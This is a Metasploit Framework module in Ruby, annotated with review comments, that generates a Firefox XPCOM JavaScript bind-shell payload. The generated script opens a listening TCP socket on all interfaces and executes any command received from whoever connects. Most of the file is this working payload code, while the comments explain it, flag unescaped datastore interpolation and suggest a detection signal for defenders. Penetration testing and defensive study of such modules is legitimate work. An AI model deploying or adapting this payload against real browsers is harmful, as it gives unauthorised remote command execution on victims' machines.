rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/firefox/shell_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Single (non-staged) payload for the 'firefox' platform. #generate returns a
# JavaScript program that uses Firefox's XPCOM API to open a listening TCP
# socket, read data from whoever connects, hand it to a command runner, and
# write the output back on the same connection.
module MetasploitModule
  # The size is declared dynamic rather than as a fixed byte count.
  # NOTE(review): presumably because the script embeds datastore values and
  # helper sources whose length varies; confirm against the framework.
  CachedSize = :dynamic

  include Msf::Payload::Single
  # NOTE(review): read_until_token_source and run_cmd_source, interpolated in
  # #generate, are not defined in this file; presumably this mixin supplies
  # them. Confirm against the mixin.
  include Msf::Payload::Firefox
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata.
  #
  # @param info [Hash] caller-supplied metadata, merged with the values below
  #   through merge_info before being passed to super.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
        'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
        'Author' => ['joev'],
        'License' => BSD_LICENSE,
        'Platform' => 'firefox',
        'Arch' => ARCH_FIREFOX,
        # Bind handler: the framework side connects to the port the script opens.
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'firefox'
      )
    )
  end

  #
  # Returns the JS string to use for execution.
  #
  # The script is a self-invoking function that:
  #   1. creates an nsIServerSocket and calls init(lport, false, -1); the
  #      second argument is the loopback-only flag, so false means the
  #      listener is not restricted to localhost;
  #   2. on each accepted connection, opens the client's input and output
  #      streams and pumps the input stream into clientListener;
  #   3. passes data collected by readUntilToken to runCmd and writes the
  #      output to the client only when runCmd reports no error (errors are
  #      dropped, nothing is sent back).
  #
  # Review notes:
  # - datastore['LPORT'] is interpolated as a bare JS expression and
  #   datastore['RHOST'] inside a double-quoted JS string. Neither value is
  #   validated or escaped here, so a non-numeric LPORT or an RHOST containing
  #   a quote or newline would change the structure of the generated script.
  #   NOTE(review): consider coercing LPORT to an Integer and JSON-quoting
  #   RHOST before interpolation.
  # - `rhost` is assigned but never referenced in the JS visible in this
  #   method. It may be read by the interpolated helper sources; confirm
  #   before removing it.
  # - No check on the connecting client is visible in this script, so anything
  #   that can reach the port gets its input passed to runCmd.
  # - For defenders: the listener is created inside the browser process.
  #   A Firefox process holding an inbound listening TCP socket is unusual and
  #   is a useful signal for host-based listening-port inventories and
  #   inbound firewall policy.
  # - Everything between the %| delimiters is emitted verbatim at runtime, so
  #   comments must stay outside the literal.
  #
  # @param _opts [Hash] accepted but not used by this method.
  # @return [String] JavaScript source for the payload.
  def generate(_opts = {})
    %|
      (function(){
        window = this;
        Components.utils.import("resource://gre/modules/NetUtil.jsm");
        var lport = #{datastore['LPORT']};
        var rhost = "#{datastore['RHOST']}";
        var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
                             .createInstance(Components.interfaces.nsIServerSocket);
        serverSocket.init(lport, false, -1);

        var listener = {
          onSocketAccepted: function(serverSocket, clientSocket) {
            var outStream = clientSocket.openOutputStream(0, 0, 0);
            var inStream = clientSocket.openInputStream(0, 0, 0);
            var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
                         .createInstance(Components.interfaces.nsIInputStreamPump);
            pump.init(inStream, -1, -1, 0, 0, true);
            pump.asyncRead(clientListener(outStream), null);
          }
        };

        #{read_until_token_source}

        var clientListener = function(outStream) {
          return {
            onStartRequest: function(request, context) {},
            onStopRequest: function(request, context) {},
            onDataAvailable: readUntilToken(function(data) {
              runCmd(data, function(err, output) {
                if(!err) outStream.write(output, output.length);
              });
            })
          };
        };

        #{run_cmd_source}

        serverSocket.asyncListen(listener);
      })();
    |
  end
end